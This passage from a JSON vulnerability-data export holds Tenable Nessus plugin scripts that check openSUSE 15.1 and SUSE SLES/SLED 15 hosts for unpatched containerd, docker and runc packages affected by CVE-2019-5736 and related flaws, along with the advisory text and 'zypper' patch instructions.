LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(128409);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/01\");\n\n script_cve_id(\"CVE-2018-10892\", \"CVE-2019-13509\", \"CVE-2019-14271\", \"CVE-2019-5736\");\n\n script_name(english:\"openSUSE Security Update : containerd / docker / docker-runc / etc (openSUSE-2019-2021)\");\n script_summary(english:\"Check for the openSUSE-2019-2021 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for containerd, docker, docker-runc,\ngolang-github-docker-libnetwork fixes the following issues :\n\nDocker :\n\n - CVE-2019-14271: Fixed a code injection if the nsswitch\n facility dynamically loaded a library inside a chroot\n (bsc#1143409).\n\n - CVE-2019-13509: Fixed an information leak in the debug\n log (bsc#1142160).\n\n - Update to version 19.03.1-ce, see changelog at\n /usr/share/doc/packages/docker/CHANGELOG.md\n (bsc#1142413, bsc#1139649).\n\nrunc :\n\n - Use %config(noreplace) for /etc/docker/daemon.json\n (bsc#1138920).\n\n - Update to runc 425e105d5a03, which is required by Docker\n (bsc#1139649).\n\ncontainerd :\n\n - CVE-2019-5736: Fixed a container breakout vulnerability\n (bsc#1121967).\n\n - Update to containerd v1.2.6, which is required by docker\n (bsc#1139649).\n\ngolang-github-docker-libnetwork :\n\n - Update to version\n git.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is\n required by docker (bsc#1142413, bsc#1139649).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1100331\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1138920\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1139649\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1142160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1142413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1143409\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected containerd / docker / docker-runc / etc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:containerd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:containerd-ctr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-libnetwork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-libnetwork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-runc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:docker-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:golang-github-docker-libnetwork\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"containerd-1.2.6-lp151.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"containerd-ctr-1.2.6-lp151.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-bash-completion-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-debuginfo-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-lp151.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-libnetwork-debuginfo-0.7.0.1+gitr2800_fc5a7d91d54c-lp151.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-runc-1.0.0rc8+gitr3826_425e105d5a03-lp151.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-runc-debuginfo-1.0.0rc8+gitr3826_425e105d5a03-lp151.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-test-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-test-debuginfo-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"docker-zsh-completion-19.03.1_ce-lp151.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"golang-github-docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-lp151.2.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"containerd / containerd-ctr / docker-runc / docker-runc-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-03T07:09:54", "description": "This update for containerd, docker, docker-runc,\ngolang-github-docker-libnetwork fixes the following issues :\n\nDocker :\n\nCVE-2019-14271: Fixed a code injection if the nsswitch facility\ndynamically loaded a library inside a chroot (bsc#1143409).\n\nCVE-2019-13509: Fixed an information leak in the debug log\n(bsc#1142160).\n\nUpdate to version 19.03.1-ce, see changelog at\n/usr/share/doc/packages/docker/CHANGELOG.md (bsc#1142413,\nbsc#1139649).\n\nrunc: Use %config(noreplace) for /etc/docker/daemon.json\n(bsc#1138920).\n\nUpdate to runc 425e105d5a03, which is required by Docker\n(bsc#1139649).\n\ncontainerd: CVE-2019-5736: Fixed a container breakout vulnerability\n(bsc#1121967).\n\nUpdate to containerd v1.2.6, which is required by docker\n(bsc#1139649).\n\ngolang-github-docker-libnetwork: Update to version\ngit.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is required by\ndocker (bsc#1142413, bsc#1139649).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-08-14T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : containerd, docker, docker-runc, golang-github-docker-libnetwork (SUSE-SU-2019:2117-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10892", "CVE-2019-13509", "CVE-2019-14271", "CVE-2019-5736"], "modified": "2019-08-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:golang-github-docker-libnetwork-kubic", "p-cpe:/a:novell:suse_linux:docker-runc", "p-cpe:/a:novell:suse_linux:docker-test-debuginfo", "p-cpe:/a:novell:suse_linux:docker-test", "p-cpe:/a:novell:suse_linux:containerd-kubic", "p-cpe:/a:novell:suse_linux:docker-kubic", "p-cpe:/a:novell:suse_linux:docker-kubic-test", "p-cpe:/a:novell:suse_linux:docker-kubic-test-debuginfo", "p-cpe:/a:novell:suse_linux:containerd", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:docker-runc-kubic-debuginfo", "p-cpe:/a:novell:suse_linux:containerd-ctr", "p-cpe:/a:novell:suse_linux:docker-kubic-debuginfo", "p-cpe:/a:novell:suse_linux:docker-libnetwork-kubic", "p-cpe:/a:novell:suse_linux:docker-libnetwork", "p-cpe:/a:novell:suse_linux:docker", "p-cpe:/a:novell:suse_linux:containerd-kubic-ctr", "p-cpe:/a:novell:suse_linux:docker-libnetwork-kubic-debuginfo", "p-cpe:/a:novell:suse_linux:docker-kubic-kubeadm-criconfig", "p-cpe:/a:novell:suse_linux:docker-debuginfo", "p-cpe:/a:novell:suse_linux:docker-libnetwork-debuginfo", "p-cpe:/a:novell:suse_linux:docker-runc-kubic", "p-cpe:/a:novell:suse_linux:docker-runc-debuginfo", "p-cpe:/a:novell:suse_linux:golang-github-docker-libnetwork"], "id": "SUSE_SU-2019-2117-1.NASL", "href": "https://www.tenable.com/plugins/nessus/127884", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:2117-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127884);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/01\");\n\n script_cve_id(\"CVE-2018-10892\", \"CVE-2019-13509\", \"CVE-2019-14271\", \"CVE-2019-5736\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : containerd, docker, docker-runc, golang-github-docker-libnetwork (SUSE-SU-2019:2117-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for containerd, docker, docker-runc,\ngolang-github-docker-libnetwork fixes the following issues :\n\nDocker :\n\nCVE-2019-14271: Fixed a code injection if the nsswitch facility\ndynamically loaded a library inside a chroot (bsc#1143409).\n\nCVE-2019-13509: Fixed an information leak in the debug log\n(bsc#1142160).\n\nUpdate to version 19.03.1-ce, see changelog at\n/usr/share/doc/packages/docker/CHANGELOG.md (bsc#1142413,\nbsc#1139649).\n\nrunc: Use %config(noreplace) for /etc/docker/daemon.json\n(bsc#1138920).\n\nUpdate to runc 425e105d5a03, which is required by Docker\n(bsc#1139649).\n\ncontainerd: CVE-2019-5736: Fixed a container breakout vulnerability\n(bsc#1121967).\n\nUpdate to containerd v1.2.6, which is required by docker\n(bsc#1139649).\n\ngolang-github-docker-libnetwork: Update to version\ngit.fc5a7d91d54cc98f64fc28f9e288b46a0bee756c, which is required by\ndocker (bsc#1142413, bsc#1139649).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1100331\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1138920\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1139649\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1142160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1142413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1143409\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10892/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-13509/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-14271/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5736/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20192117-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b0a9a6ef\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15-SP1:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2019-2117=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-2117=1\n\nSUSE Linux Enterprise Module for Containers 15-SP1:zypper in -t patch\nSUSE-SLE-Module-Containers-15-SP1-2019-2117=1\n\nSUSE Linux Enterprise Module for Containers 15:zypper in -t patch\nSUSE-SLE-Module-Containers-15-2019-2117=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5736\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:containerd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:containerd-ctr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:containerd-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:containerd-kubic-ctr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-kubic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-kubic-kubeadm-criconfig\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-kubic-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-kubic-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-libnetwork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-libnetwork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-libnetwork-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-libnetwork-kubic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc-kubic-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:golang-github-docker-libnetwork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:golang-github-docker-libnetwork-kubic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"containerd-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"containerd-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"containerd-kubic-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"containerd-kubic-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-kubic-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-kubic-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-kubic-kubeadm-criconfig-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-kubic-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-kubic-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-libnetwork-debuginfo-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-libnetwork-kubic-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-libnetwork-kubic-debuginfo-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-runc-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-runc-debuginfo-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-runc-kubic-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-runc-kubic-debuginfo-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"docker-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"golang-github-docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"golang-github-docker-libnetwork-kubic-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"containerd-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"containerd-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-libnetwork-debuginfo-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-runc-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-runc-debuginfo-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"golang-github-docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"containerd-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"containerd-kubic-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"containerd-kubic-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-kubic-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-kubic-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-kubic-kubeadm-criconfig-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-kubic-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-kubic-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-libnetwork-kubic-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-libnetwork-kubic-debuginfo-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-runc-kubic-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-runc-kubic-debuginfo-1.0.0rc8+gitr3826_425e105d5a03-6.21.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"docker-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"golang-github-docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"golang-github-docker-libnetwork-kubic-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"containerd-ctr-1.2.6-5.16.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"docker-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"docker-test-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"docker-test-debuginfo-19.03.1_ce-6.26.2\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"golang-github-docker-libnetwork-0.7.0.1+gitr2800_fc5a7d91d54c-4.15.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 